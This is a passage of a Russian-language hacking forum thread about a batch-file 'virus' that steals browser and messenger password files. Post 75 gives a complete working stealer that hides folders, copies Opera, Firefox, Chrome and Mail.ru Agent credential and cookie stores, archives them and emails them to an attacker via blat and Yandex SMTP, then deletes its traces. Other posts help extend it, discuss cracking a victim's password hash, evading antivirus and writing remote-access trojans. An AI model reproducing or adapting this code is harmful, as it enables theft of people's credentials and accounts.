Инструкция взлома - Это пособия для безопасности!

Объявление

Hash Profit

Хочешь получить WMR бонус? Вот несколько рабочих WMR бонус программ, которые раздают бонусы за посещение их сайтов по 0.77 р., мало но каждый день что стоит кликать на кнопку и получать свой бонус, сколько накапает к примеру за месяц, за год?
worldwm
5-kopeek
icqmir
1 клик 1 wmr
3.03WMB

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.


Вы здесь » Инструкция взлома - Это пособия для безопасности! » Всё что касается вирусов. » Пример простого bat вируса,ворующего файлы с паролями.


Пример простого bat вируса,ворующего файлы с паролями.

Сообщений 61 страница 90 из 187

61

aza у меня нету в данный момент винды и возможности запустить сендмаил что бы поглядеть команды сэндмайла,да и времени четсно говоря в данный момент нету.
Запусти сендамил и посмотри команды на него,он должен в виде месаги выкидывать список команд,вот по этим командам и пиши.

0

62

как на данный момент обстоит с расшифровкой хэшей мэйл агента, полученных из реестра? logins3 ветка? у кого-нибудь получилось?

0

63

ну или может есть возможность зная md5 от пароля поменять его сторонней програмкой, как было с аськой раньше в одно время? ибо прога для входа на веб-интерфейс зная мд5 есть для агента.

0

64

Jay_09
в этом мел агент пасс в md5?
так..
Online Reverse Hash Tool v2.5

0

65

Mail.ru Get key (Агент 5.7) .
Mail.ru History Reader 3.0.0.2
Там есть офф сайт кому нужно будет пройдётся глянет может чего нового увидет.

0

66

У меня всё получилось,а вот только Опера не пропускает. Пишет,что вирус. Подскажите что делать?

0

67

MOssWar спасибо за советы, но это пробовал уже. поиск по сайтам результата не дал, нигде такого хэша нет. Утилиту GetKey и имел ввиду, когда писал про авторизацию в браузере. Но нужен не вход на сайт под пользователем, а все таки пароль, так как войдя на сайт сменить пароль всё равно не удастся, он спрашивает текущий при внесении любых изменений. может ещё какие идеи есть? пока поставил брута, пишет через 10 дней закончит )) хэш c72fe2619c1390d93c79fb0f525c3d2e

0

68

всё описано нормально! Пробую...

0

69

чуваки всем здарова у мя один не большой вопросик .... хотя нет большой но пока ответ нужен на этот вот тут чё надо писать %systemroot%\wincs\blat.exe -install -server smtp.yandex.ru -port 587 -f логин@yandex.ru -u логин -pw  вот там где надпись -pw пароль от почтового ящика или чё?  за раннее спасибо !!

0

70

ANtoha пароль от почты)

0

71

Добрый вечер. Подскажите пожалуйста какие ещё файлы нужны для полноценной коллекции куков от google hrome по мимо файлов Cookies, Login data.  Имея эти 2 файла я только могу зайти автоматически под акк жертвы на сайты где он сохранял логин и пароль, так же просмотреть логины в параметрах.... не хватает файла отвечающего за пароли...

0

72

Все сделал верно, когда на мыло приходят данные , открываю а там не разбериха, символы((( как исправить?

0

73

MOssWar написал(а):

Файлы которые придут на почту,можно расшифровать с помощью программы,правда не все,а только wand.dat от оперы и то если её не обновляли до 11*версий.Все остальные файлы можно расшифровать заменив на свои.

Читай внимательней.

0

74

Всем привет! Огромная просьба! помогите пожалуйста новичку в этом деле! как сделать что бы батник копировал пароли не только с Оперы и Мозиллы, а что бы еще и с Гугл Хрома? Заранее благодарю за ответ! Статья очень познавательная! Автору респект! =)

0

75

Raizel
на сайте есть подобный трой но на другом языке ВОТ (там хром тоже есть)
если на бате хочешь то будет вот так и хром!

Код:
@echo off 
md %systemroot%\wincs 
md %SystemDrive%\pass\
md %SystemDrive%\pass\opera\ 
md %SystemDrive%\pass\Mozilla\ 
md %SystemDrive%\pass\MailAgent\
md %SystemDrive%\pass\MailAgent\reg
md %SystemDrive%\pass\chrome\
attrib %systemroot%\wincs +h +s +r 
attrib %SystemDrive%\pass +h +s +r 
copy /y "%systemroot%\blat.exe" "%systemroot%\wincs\blat.exe" 
copy /y "%systemroot%\blat.dll" "%systemroot%\wincs\blat.dll" 
copy /y "%systemroot%\blat.lib" "%systemroot%\wincs\blat.lib"  
CD /D %APPDATA%\Opera\Opera\ 
copy /y wand.dat %SystemDrive%\pass\opera\wand.dat 
copy /y cookies4.dat %SystemDrive%\pass\opera\cookies4.da   
regedit.exe -ea %SystemDrive%\pass\MailAgent\reg\agent.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins2 
regedit.exe -ea %SystemDrive%\pass\MailAgent\reg\agent_3.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins3 
CD /D %APPDATA% 
Xcopy Mra\Base %SystemDrive%\pass\MailAgent /K /H /G /Q /R /S /Y /E >nul 
Xcopy Mra\Update\ver.txt %SystemDrive%\pass\MailAgent /K /H /G /Q /R /S /Y >nul 
cd %AppData%\Mozilla\Firefox\Profiles\*.default\ 
copy /y cookies.sqlite %SystemDrive%\pass\Mozilla\cookies.sqlite  
copy /y key3.db %SystemDrive%\pass\Mozilla\key3.db  
copy /y signons.sqlite %SystemDrive%\pass\Mozilla\signons.sqlite 
cd %userprofile%\Local Settings\Application Data\Google\Chrome\User Data\Default\
copy Login* %SystemDrive%\pass\chrome\ /y
copy Web* %SystemDrive%\pass\chrome\ /y 
copy /y %Windir%\Rar.exe %SystemDrive%\pass\Rar.exe >nul 
del /s /q %SystemRoot%\Rar.exe 
%SystemDrive%\pass\rar.exe a -r %SystemDrive%\pass\pass.rar %SystemDrive%\pass\ 
copy /y  %SystemDrive%\pass\pass.rar %systemroot%\wincs\pass.rar 
cd %systemroot%\wincs 
%systemroot%\wincs\blat.exe -install -server smtp.yandex.ru -port 587 -f логин@yandex.ru -u логин -pw Пароль 
ren *.rar pass.rar 
%systemroot%\wincs\blat.exe -body FilesPassword -to логин@yandex.ru -attach %systemroot%\wincs\pass.rar 
rmdir /s /q %SystemDrive%\pass 
rmdir /s /q %systemroot%\wincs 
del /s /q %systemroot%\blat.exe 
del /s /q %systemroot%\blat.dll 
del /s /q %systemroot%\blat.lib 
attrib +a +s +h +r %systemroot%\wind.exe
EXIT 
cls

______________________________________________________________________________________

почитай справочник по командной строке

0

76

Спасибо огромное!!! щас проверю! =)

0

77

подскажите пожалуйста, как сделать что бы батник копировал куки еще и с IE ? а то я уже все перепробывал, не знаю как правильно прописать, скорее всего не правильно указываю папку, откуда копировать...  https://forumupload.ru/uploads/000f/db/02/1755-3.gif

xcopy %userprofile%\Cookies\*.* %SystemDrive%\pass\IE\ /K /H /G /Q /R /S /Y /E >nul

или я не правильно задал начальную папку?

P.S. простите за глупые вопросы, я только учусь  https://forumupload.ru/uploads/000f/db/02/1750-2.gif

0

78

кто знает делфи 7

0

79

Подскажите пожалуйста сделал все как написано , на почту пришло но все папки пустые. Что это может быть ?

0

80

это значит что нубас ты))! https://forumupload.ru/uploads/000f/db/02/1753-1.gif

0

81

Raizel написал(а):

подскажите пожалуйста, как сделать что бы батник копировал куки еще и с IE ?

на кой они нужны?)
Не ну в принципе как знаешь,пробуй xcopy "%userprofile%\Cookies\*.*" "%SystemDrive%\pass\IE\ *.*" /k /q /s /e /h /y >nul
На счет пути хз,сейчас нету возможности в винду залезть.

aza написал(а):

кто знает делфи 7

На хрена он нужен?)
Заюзай лучше ASM,на много превосходит делфи и ему подобные.

zaklepa написал(а):

Подскажите пожалуйста сделал все как написано , на почту пришло но все папки пустые. Что это может быть ?

Да хз что там у тебя может быть)
Может фаер\антивирус блокирует,а может всё таки сам в чем тупанул.

0

82

MOssWar
на ASM ты можеш написать троян для удаленного доступа
я видел такой троян на делфи

0

83

а камп поломать можно?

0

84

подскажите как радмином пользоватся у меня на постой пишет соединение не удалось! https://forumupload.ru/uploads/000f/db/02/1754-1.gif [b][/b]

0

85

semen еще раз увижу что флудиш на форуме то сразу бан! Правила ресурса The Hack Word
если хочешь задать вопрос то для этого тоже есть раздел можешь создать там тему!
думаю все понятно!

0

86

aza написал(а):

на ASM ты можеш написать троян для удаленного доступа
я видел такой троян на делфи

Такой троян можно написать практически на чём угодно,на асме так он будет весить раз в десять меньше чем на делфи,да вообще делфи асму не соперник.
Почётай инфы по асму,полазь по форумам программов на асме,да не только.
FASM + FASM Editor 1.0

0

87

MOssWar
ты посматри на исторю
асм отстал

0

88

aza написал(а):

ты посматри на исторю
асм отстал

чушь не пори,асмовские вставки используются практически во всех языках программирования,в том же делфи есть возможность использования вставки асма(или фасма),так как у асма гораздо больше возможностей чем у делфи.
По сей день на асме пишется сотни программ и вполне успешно,даже успешней чем на каком либо другом языке,просто мозгов не у всех хватает на асме царапать.

0

89

MOssWar
этого я не отрицаю но ты на асме хотябы попробуй написать билдер майл агента

0

90

aza а он мне нужен?))
Лучше заморочится над каким нить руткитом,чем писать какую нить хрень вроде билдера майла.
Если волнует графический интерфейс и не хватает на асм,заюзай c++,будет всё же путёвей чем делфи,вес меньше,возможностей опять же больше,хотя и на асме вполне возможно написать,не то что фейк на майла,а саму копию майла.
Или ещё какой язык,даже тот же бэйсик(правда конписация возможностей здесь будет через вставки асма),вообщем один фиг даже в этом плане делфи в подмётки не годится  https://forumupload.ru/uploads/000f/db/02/1754-5.gif
Как пример,существует не мало ОС(не говоря уже об приложениях,или каких либо программах),написанные чисто на одном ASM(включая в целом асм,то есть оринтироваясь на все разновидности его,тип NASM,TASM(извращение),FASM,MASM и т.д.
http://thehackword.ru/viewtopic.php?id=609 - в ОС есть практически всё что нужно,полностью рабочия версия и самое главное что имеет охринительный вес,графические интерфейс как пример во многом превосходят любой интерфейс майла или какого другого билдера.
http://thehackword.ru/viewtopic.php?id=610 - графический интерфейс и т.д.(пробуй такое написать на делфи,да ещё и с таким весом,за....)
http://thehackword.ru/viewtopic.php?id=611 - обрати внимание на вес.

0


Вы здесь » Инструкция взлома - Это пособия для безопасности! » Всё что касается вирусов. » Пример простого bat вируса,ворующего файлы с паролями.